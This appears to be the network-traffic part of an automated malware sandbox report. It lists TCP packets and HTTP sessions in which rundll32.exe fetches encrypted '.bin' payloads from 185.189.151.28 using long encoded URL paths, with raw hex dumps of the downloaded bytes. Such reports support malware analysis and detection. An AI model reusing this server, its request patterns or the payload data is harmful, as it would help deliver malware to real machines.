                              May 4, 2022 16:27:53.987541914 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:53.987565994 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:54.005240917 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:54.005280018 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:54.005304098 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:54.005327940 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:54.005351067 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:54.005352020 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:54.005373955 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:54.005386114 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:54.005393028 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:54.005417109 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:54.005429029 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:54.005438089 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:54.005439997 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:54.005464077 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:54.005465031 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:54.005481958 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:54.005489111 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:54.005503893 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:54.005511999 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:54.005518913 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:54.005537033 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:54.005554914 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:54.005558968 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:54.005578041 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:54.005594015 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:54.005621910 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:54.005697966 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:54.005723000 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:54.005742073 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:54.005747080 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:54.005765915 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:54.005770922 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:54.005779028 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:54.005795002 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:54.005808115 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:54.005812883 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:54.005829096 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:54.005844116 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:54.005853891 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:54.005897999 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:54.005919933 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:54.005958080 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:54.005959034 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:54.005975008 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:54.005995989 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:54.006007910 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:54.006391048 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:54.006419897 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:54.006438017 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:54.006474972 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:54.006477118 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:54.006503105 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:54.006515026 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:54.006526947 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:54.006536007 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:54.006551981 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:54.006568909 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:54.006570101 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:54.006594896 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:54.006607056 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:54.006653070 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:54.006700039 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:54.006701946 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:54.006725073 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:54.006738901 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:54.006748915 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:54.006763935 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:54.006772995 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:54.006776094 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:54.006798029 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:54.006812096 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:54.006817102 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:54.006836891 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:54.006850004 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:54.006988049 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:54.007011890 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:54.007035971 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:54.007045984 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:54.007060051 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:54.007066011 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:54.007082939 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:54.007093906 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:54.007107019 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:54.007117033 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:54.007124901 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:54.007128000 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:54.007148981 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:54.007164955 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:54.007174015 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:54.007186890 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:54.007196903 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:54.007220984 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:54.007229090 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:54.007246017 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:54.007266998 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:54.007271051 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:54.007288933 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:54.007308960 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:54.007361889 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:54.007400990 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:54.007426023 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:54.007448912 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:54.007452965 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:54.007467031 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:54.007505894 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:54.007534981 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:54.007584095 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:54.007607937 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:54.007631063 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:54.007664919 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:54.007689953 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:54.007705927 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:54.007713079 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:54.007733107 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:54.007739067 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:54.007755995 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:54.007764101 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:54.007787943 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:54.007791042 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:54.007812023 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:54.007817030 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:54.007834911 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:54.007843018 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:54.007859945 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:54.007864952 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:54.007883072 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:54.007894993 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:54.007900953 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:54.007925987 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:54.007931948 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:54.007940054 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:54.007951021 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:54.007967949 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:54.007977009 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:54.007997036 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:54.008001089 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:54.008018970 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:54.008024931 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:54.008049965 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:54.008058071 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:54.008074045 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:54.008074045 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:54.008097887 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:54.008107901 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:54.008119106 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:54.008122921 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:54.008142948 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:54.008143902 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:54.008167982 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:54.008192062 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:54.122081995 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:54.139204979 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:54.411616087 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:54.411673069 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:54.411736965 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:54.411773920 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:28:50.846771955 CEST4976980192.168.2.4185.189.151.28

                              DNS Answers

                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                              May 4, 2022 16:27:33.081885099 CEST8.8.8.8192.168.2.40xd133No error (0)l-0007.l-dc-msedge.net13.107.43.16A (IP address)IN (0x0001)

                              HTTP Request Dependency Graph

                              • 185.189.151.28

                              HTTP Packets

                              Session IDSource IPSource PortDestination IPDestination PortProcess
                              0192.168.2.449769185.189.151.2880C:\Windows\SysWOW64\rundll32.exe
                              TimestampkBytes transferredDirectionData
                              May 4, 2022 16:27:53.231327057 CEST1212OUTGET /drew/yaLRzubGjQS/CFxKDeNAAfhLlC/CaygnSUs24bnRCfVOMlKd/kOu58i9k96sMGpEh/2ImNOGSnuowiNkO/ip_2FJtr3_2FyC3y34/NWeB6KDbS/szu4WIEy31uBJrZBRkk7/BA3lZi_2FOvOpDSYS4s/rj2HYxhZ8zs8SSN1QxOHNt/a0noZ7RHbBD3e/0lyarAzU/kswi_2B_2Bji3xmfI9dMO1H/eF7wdYyOYS/J0KjUNI3Yrq9HIDIZ/2ePpl9Tr16LA/Mto8yX4U3i1XH7H/1gu.jlk HTTP/1.1
                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                              Host: 185.189.151.28
                              Connection: Keep-Alive
                              Cache-Control: no-cache
                              May 4, 2022 16:27:53.534866095 CEST1213INHTTP/1.1 200 OK
                              Server: nginx/1.18.0 (Ubuntu)
                              Date: Wed, 04 May 2022 14:27:53 GMT
                              Content-Type: application/octet-stream
                              Content-Length: 186001
                              Connection: keep-alive
                              Pragma: public
                              Accept-Ranges: bytes
                              Expires: 0
                              Cache-Control: must-revalidate, post-check=0, pre-check=0
                              Content-Disposition: inline; filename="62728d697bd35.bin"
                              Data Raw: 90 fe 16 00 dd 20 a6 90 00 22 81 96 31 0c 06 ee 2c a0 48 f2 36 47 2b a8 1f 78 fb 84 fe 80 bc 68 83 a3 b0 1b 36 53 4b 75 0f a7 82 72 a1 41 e1 ff 47 06 9d 2a 90 8e 26 f8 83 6e 4c 7a ba 23 11 cb 7a c4 b5 76 5c eb 93 5b 14 3c c9 98 a5 e3 8b c6 36 cc 13 99 54 83 1a 4c 7b 46 49 91 17 ea 3b bb 0c 41 7e bf 1b 94 ad a3 32 05 aa 3b b0 4f 0c cb fc da 60 91 e2 bd 0d 03 9d 3c bd a2 dd d7 3f 0f 94 dc e3 06 b6 33 92 7e 82 88 84 01 f1 a2 02 d5 be cd 05 f8 80 06 a7 6e 5b 13 39 e7 33 43 f9 ee 65 41 c1 09 48 5c 39 3b 96 45 42 2c d6 0e 26 1b 0d 07 a7 4a 31 10 18 b4 36 c2 cb 88 ce 0e 68 30 dd c9 12 ff 5a 51 b6 1f 27 30 1a 25 a6 fb 5f b1 43 86 48 4a be 41 1d 15 20 30 a1 22 5a 46 58 f9 15 cc 69 9f 79 f8 78 b2 f1 f4 64 27 68 96 aa c1 73 d4 a7 58 3d ff ca 94 06 f9 ff 3e aa d1 00 6e c4 9d 6b 43 ac 0c 73 10 7f 0a 46 6d a9 74 29 b7 65 25 b5 77 93 76 25 7a b8 d9 0d 9c 83 ab 02 b1 78 eb 7b 8d 01 61 4d 6f 2e 0a da b3 c7 26 36 df 2a 95 d4 bf df d3 28 b1 c4 44 91 f7 ed 03 59 40 3e 4e f4 f3 2c 45 08 6c ca 1e 96 ba cc 33 c6 d6 79 6e fe fc 1f 27 b2 8a 2c 3c 8b e3 b4 14 90 a6 c2 99 62 62 09 88 68 9b e5 5d 5a 1b 90 23 e3 3f 1e 37 65 79 84 54 e6 fa 2d 39 d0 ab 72 5f 30 51 17 b6 8d 50 6c f0 28 5a 7e 77 5d 4f e7 c7 d6 f5 10 1c e5 da 36 7b 84 8e 94 d4 b7 df fa ab aa 17 53 ac e3 5b b0 72 c2 c8 65 0a a1 68 34 7f bd db 5d 00 76 de 42 e5 35 53 61 1f b2 46 e4 5d b5 7e a8 1e 4b 28 b7 9d 61 42 3c ec 8f ef c7 31 1c 8f 4c 68 8c 93 db e0 4b 86 ff 36 5e 8b e5 b6 46 f3 43 2c c5 92 03 de c3 8a 33 76 52 de 17 e1 6a 06 82 43 9b 7d 58 a6 f9 59 d0 35 f8 22 ec 02 92 5f c2 94 98 f9 9c 96 72 7e 76 47 66 f2 a7 7b 29 58 64 8a b4 df fe fc 78 4c 1b 45 88 71 86 ab 44 26 65 5b 29 85 31 04 6f 88 9a 15 b6 69 e2 90 95 32 fe 62 fe a0 0f 8f 8d 27 8d d0 63 31 96 18 ad c3 68 6d 1c 70 e8 65 66 f8 3d 34 d6 fb 93 0e 68 95 ae 3f 77 85 3e f6 c2 fd bd a3 12 e3 f3 a6 45 7e 74 c5 8b 22 2b 46 9f b3 fb 84 39 cc c4 6e 5f 09 3e cf c2 0b 7a d8 1a a2 f7 8f d2 7c c9 c7 0a 86 fa 2f c2 c4 67 c1 14 c1 36 f4 7e ca 10 53 88 8f 87 0c 9a d8 40 02 b6 78 d9 3c 5d 0e 45 6d e7 1a 21 99 b0 29 1b e3 e0 c0 2b 02 47 bc 53 00 3c 8a 66 74 ca 12 c0 49 dc 75 43 18 6a 42 18 c7 9e 0b 55 fd 45 f0 5b 24 3a b5 3c 10 b5 a7 10 c7 28 d0 c7 35 3f 54 35 0e 43 41 1d bf f5 f3 9a f4 ff 81 26 48 fc 80 5f f1 f8 71 99 e4 0e 17 6a 1c 75 5d 64 95 f7 e1 88 a2 00 94 90 5f 6c d5 cd fc a5 72 b7 b6 e5 e8 5a 13 63 f5 4b b5 8e f2 82 41 64 7f ad 8e bd e9 6e 51 d0 ef ec 63 ab 78 09 ea e7 8c 71 e8 5b 12 a9 e1 0c 48 ed cb 06 da f3 7d ca 85 d7 45 2a 4b b1 c5 1c 9e 75 8e 33 0a 02 a8 57 71 0d b4 5c b3 46 dc 38 88 72 5b 66 00 55 4f 00 28 2c 61 67 7b 85 11 64 8c 84 de df 2f 2c 69 eb ba a7 86 a4 d1 ce df aa e3 93 48 d5 31 9a b5 8c e4 87 f9 e2 a0 e3 0c 04 b3 c4 40 f7 0f 35 de fc 0b d9 d3 2a 45 b4 91 93 26 51 19 8d f2 45 67 3b ed ed 42 e2 04 cd 3e 9c e7 c6 6f 15 1b aa 04 9e d3 e4 9f c4 7b 67 37 b7 40 48 05 e7 10 93 59 8a 81 f5 ca 77 22 e4 64 f5 a9 d5 0a 81 0e 53 8f c5 43 23 2d 3d 0f e4 a2 8a df c3 7b 13 3e 33 04 8c 56 2d 62 47 40 39 58 13 9c 69 1e b2 1f da 02 b7 59 0b d1 3e
                              Data Ascii: "1,H6G+xh6SKurAG*&nLz#zv\[<6TL{FI;A~2;O`<?3~n[93CeAH\9;EB,&J16h0ZQ'0%_CHJA 0"ZFXiyxd'hsX=>nkCsFmt)e%wv%zx{aMo.&6*(DY@>N,El3yn',<bbh]Z#?7eyT-9r_0QPl(Z~w]O6{S[reh4]vB5SaF]~K(aB<1LhK6^FC,3vRjC}XY5"_r~vGf{)XdxLEqD&e[)1oi2b'c1hmpef=4h?w>E~t"+F9n_>z|/g6~S@x<]Em!)+GS<ftIuCjBUE[$:<(5?T5CA&H_qju]d_lrZcKAdnQcxq[H}E*Ku3Wq\F8r[fUO(,ag{d/,iH1@5*E&QEg;B>o{g7@HYw"dSC#-={>3V-bG@9XiY>
                              May 4, 2022 16:27:53.534919977 CEST1215INData Raw: 7c e5 07 28 e7 97 88 65 8c 42 65 12 be 3c 6e 38 dd ae 31 b0 00 6d 67 0c 0c 1b ef cc 43 84 5e 73 ad 05 a5 dd 1f bd d3 3a d0 a2 96 f6 61 1d 21 dc f0 ae ff ab fe de df b7 31 57 f7 18 f7 dd 5a e1 9d 99 3e cb a0 6b 6f 9c c6 53 97 06 dc 65 2d e0 e5 5a
                              Data Ascii: |(eBe<n81mgC^s:a!1WZ>koSe-Z0QW&'S*6RRM}ix# &am41^2Cha/Zf=(oUdv$PQd7n-45kWPw2tI:j`=|Q#No{
                              May 4, 2022 16:27:53.535007954 CEST1216INData Raw: 81 01 21 13 1b 0e fa 23 7a 85 b2 5f a7 1a f1 b0 f3 10 cd 90 bb 13 4e cc 62 ab 26 e9 45 51 ea 2b 1c 30 5f 1d 40 3b f5 32 9c 85 e3 8c 2f 0b fb 03 03 12 18 20 c6 e9 54 d0 0f 9d c2 9a 7a 02 7d 4f bd 74 79 e9 d8 dc 36 04 92 80 fc 2b aa 0e 72 6b 54 61
                              Data Ascii: !#z_Nb&EQ+0_@;2/ Tz}Oty6+rkTa@*9If1=f6_"zKT(}X<[Zvero-b8(Zl=a*<qfC^[]g?[$X8CN ANy!6c9U8
                              May 4, 2022 16:27:53.535043955 CEST1218INData Raw: 07 65 8e 45 2f ff a8 5f 21 88 ac fd 2f 32 fe 2b 28 01 00 29 3b d8 eb 1d 6b 8b 6a 47 f2 9b 12 cf 02 a7 1d 66 e8 ae b6 d4 c5 df c6 46 41 d9 95 a0 dc a2 67 35 3e 19 fc 5a f0 10 4c 2e e1 7e 0c 48 cf aa 36 fe 2e 2a 12 d9 1b 10 09 ed 5a b4 c7 82 3e 33
                              Data Ascii: eE/_!/2+();kjGfFAg5>ZL.~H6.*Z>3glGh0'ZO\6p`Da__3@{{WOXB0Mo{/>EADKER-j9-gQ75O{^Ng5:g"~'zj\[|
                              May 4, 2022 16:27:53.535105944 CEST1219INData Raw: 1d 9b 5a 47 2d 4e 6f 98 87 ad a5 6a 1e c6 3c 05 be 48 cc ba 1d d3 5b f8 f8 68 df 7d a2 95 56 2b 44 cd c8 e4 e3 f7 13 04 20 18 62 b0 f0 c0 91 a9 fb 0a 42 a5 3c fe 9a 56 07 98 40 e1 9b fd 9d 93 bd 63 29 a9 24 44 c6 cb 9c 99 e6 18 86 f2 c0 4d a5 7c
                              Data Ascii: ZG-Noj<H[h}V+D bB<V@c)$DM|j\LD!"tcM%? \~jv_ac4g7u}K*cu[j,nQ%.>87H5-A/4]?ZK?%@#qMK^CZ)0w
                              May 4, 2022 16:27:53.535140991 CEST1221INData Raw: 9b 32 44 85 0e 85 38 a8 96 86 b8 32 31 f8 fb 3f ce 22 69 e4 88 7f 5c bd 56 b9 0b 9a 8a 57 77 6e b3 18 8b 80 b7 43 c0 79 ea 9b 59 46 3a 4c a3 9c 4a 63 37 a4 f1 b8 e1 18 15 40 18 90 52 0c 7a 25 70 39 a0 65 ac 7b d9 19 95 b7 8c 3d 06 9d 2c 50 9a d1
                              Data Ascii: 2D821?"i\VWwnCyYF:LJc7@Rz%p9e{=,P>G6fDZ6{)gHvgq)#ch.za0b_T=a!#w/%q!5B|;poiMucE[}?#VLa9QK:&,*1v
                              May 4, 2022 16:27:53.535248995 CEST1221INData Raw: 89 37 ef 5e 93 27 61 3b e9 d7 bd c9 f4 ce e8 59 f5 fd 64 51 6a 34 7d 33 aa 72 b7 f1 13 4d d4 e1 b0 ff 11 e8 25 84 f0 e7 04 e9 6a fe 55 85 7c 74 94 a0 57 7e 02 c5 4f f4 df 98 a2 c6 f8 10 63 c2 71 bf f4 af 1e 11 1d 77 86 74 8d 7b a5 49 df 1c 2d 27
                              Data Ascii: 7^'a;YdQj4}3rM%jU|tW~Ocqwt{I-'}l/TI-4_*hQXe&$x`;_#9SgDNqhN3$l
                              May 4, 2022 16:27:53.535312891 CEST1222INData Raw: 88 50 d8 44 f9 d4 c5 f5 b1 f6 1a 90 ec d5 e7 7f eb fe f7 51 81 b8 b6 2f 71 54 61 3b 2c 6c ff d5 5f 43 c9 a5 e9 6c 29 60 41 fa 81 d6 0b c4 e1 3b 4f 05 51 03 69 fe 18 ce f9 35 fc d7 42 ad a1 fe d8 cf 1f 00 a9 0a 2f b6 2e be 9e a4 d5 8e 5a db 2a 91
                              Data Ascii: PDQ/qTa;,l_Cl)`A;OQi5B/.Z*klxhW&3Y|G8\1)/6J<fyLR50va"m!g4qD[;\gXtYyY5B!LK
                              May 4, 2022 16:27:53.535350084 CEST1224INData Raw: e8 4a 0b 3e 64 a1 a4 64 7b 92 28 ee d1 b9 eb 1a 50 fa a2 f4 e4 26 b2 fa c4 65 e3 9c b2 75 ed 35 91 4b 00 6e 97 6f e9 9f c9 31 89 1d fa c4 bb 24 d5 0f c0 9d 4e 9c 0b 95 07 77 1e ba 06 f5 d8 45 af 3c 1b 46 44 f6 ba 2c ea 0e e6 20 67 bf 0c 3b a6 56
                              Data Ascii: J>dd{(P&eu5Kno1$NwE<FD, g;V+K_>?[&>012;Ye].fr0Km$9/@7Us=Ju&=hDs>g0J^*_k?!)y&u^1'37Nm3{%O?<W\iq
                              May 4, 2022 16:27:53.535409927 CEST1225INData Raw: a6 99 8e 66 a4 ed 14 8a 56 de 76 54 16 9c 8c 6c b7 09 36 ac b9 8c 34 07 25 93 b3 77 cd be d2 ac 71 60 cb 63 e5 ae 4c b3 57 76 16 48 ba 0b b0 d3 c6 9c 3b 53 2e 75 0f 8c f2 d8 06 e1 ea d6 e3 10 58 4d 41 71 45 c8 41 73 11 73 8b 24 28 df 23 e1 af c5
                              Data Ascii: fVvTl64%wq`cLWvH;S.uXMAqEAss$(#:s\V~bq2swU)M@U/=k[$fn(Z5%a<CW63K0zkkQL*yRrxF}|)Y#v#qg(eMW/MkV
                              May 4, 2022 16:27:53.552704096 CEST1225INData Raw: c8 07 22 36 95 02 0c 58 e3 79 59 76 89 c8 79 5a ab 13 0c d7 6a d3 82 82 49 3f 35 a0 e3 78 3a b9 9b a4 ee b3 81 5e 2a 58 4b 6e cf 63 59 96 95 f4 e1 31 45 3b 08 47 16 d6 4e 32 79 d7 67 09 2d 48 da 84 71 95 f9 b3 95 32 4a 8f 36 5c e0 9a 18 25 db 69
                              Data Ascii: "6XyYvyZjI?5x:^*XKncY1E;GN2yg-Hq2J6\%i
                              May 4, 2022 16:27:53.642851114 CEST1410OUTGET /drew/1WYEBXmiF_2FMnySkI/AGFp1zkHl/1n_2BEbfMMGs7_2FFktP/VnEJxGiu_2BRheq2fuh/m_2BewmRx2tkooth41m1v2/ScpupYz0Zq373/g7DAOhtw/iFxPzO8lMv_2FTBIGbEpoxM/_2BCzEa_2F/P_2F_2BQrmvSKhVMj/GyG1jPMXpOEy/oR5Pq_2FkHh/PA1zCgDa0RmsjY/QkvATPynH2lMVaaST9iah/v7ORKI7orJRBYUn3/rdkm98ca_2BPJFG/T0_2BoDf88Xk4HDERX/d7f20yS8m/U9grT5w.jlk HTTP/1.1
                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                              Host: 185.189.151.28
                              Connection: Keep-Alive
                              Cache-Control: no-cache
                              May 4, 2022 16:27:53.934010029 CEST1411INHTTP/1.1 200 OK
                              Server: nginx/1.18.0 (Ubuntu)
                              Date: Wed, 04 May 2022 14:27:53 GMT
                              Content-Type: application/octet-stream
                              Content-Length: 238738
                              Connection: keep-alive
                              Pragma: public
                              Accept-Ranges: bytes
                              Expires: 0
                              Cache-Control: must-revalidate, post-check=0, pre-check=0
                              Content-Disposition: inline; filename="62728d69e08bf.bin"
                              Data Raw: 3b 4c 6b f7 b7 25 70 03 88 2d 7a 37 9e a1 c8 64 0b d8 31 31 97 0f c5 b0 5f f3 81 6d 9e c3 45 83 0a 34 18 f9 2a 0e ff 72 ff c7 33 d5 29 5d 81 f6 a5 6c 33 59 c7 fc d9 7d 59 a6 2c 44 a0 08 b0 48 8b 5c 88 ed 4d 9c 4e f2 9c 04 cf da 87 8f fc 28 44 1b 1f d6 84 bb dc 53 47 f0 25 da f7 b6 56 48 26 5b 83 11 f9 80 79 d3 3f ab 3f 7b 8a 14 23 8f 4d 34 6e a5 8d 52 88 cb c6 51 bd 4e 27 49 d6 ba 33 30 b3 e5 52 76 59 f9 49 45 bb 09 82 03 75 7c e0 12 67 43 e1 33 8e b9 58 1e 5a b6 16 2b cf ae 0e 8d cd e6 c9 bb 31 32 9c b6 7f 38 ef b7 14 c5 6b 56 72 db db f5 20 42 b0 21 7b c2 d3 e4 6b fa b6 29 2f 63 6f 43 cf fd 33 d1 f1 f3 33 82 eb 56 90 92 b4 a4 9c 0b 34 10 8d ed df d7 30 79 ee 6a 70 e6 2e 5b 2f d9 bf ad 8c 81 5f ec d7 15 c8 85 f6 42 0f 37 b8 b0 93 ac a1 85 c4 23 5e e0 43 b2 f2 93 6a d4 39 18 f6 17 0d d7 36 b6 2c 4f 0e 34 06 73 fa a7 52 3b a0 32 82 5c f1 6b e4 7a 99 fc 8d 27 58 8a 96 1b 31 e8 14 ee 43 b7 d2 fb 67 09 cb 2e 03 64 ad e4 8a 6a 5f 40 27 ac a0 21 ac cd 7a c6 94 f3 0b 04 1c f4 15 03 a5 59 24 02 68 2c 35 6a 8b 51 d7 90 e5 d9 30 8a 7f dc c2 68 ae 3c 42 9a 5c 68 06 a5 c2 c4 6e 0f ef 64 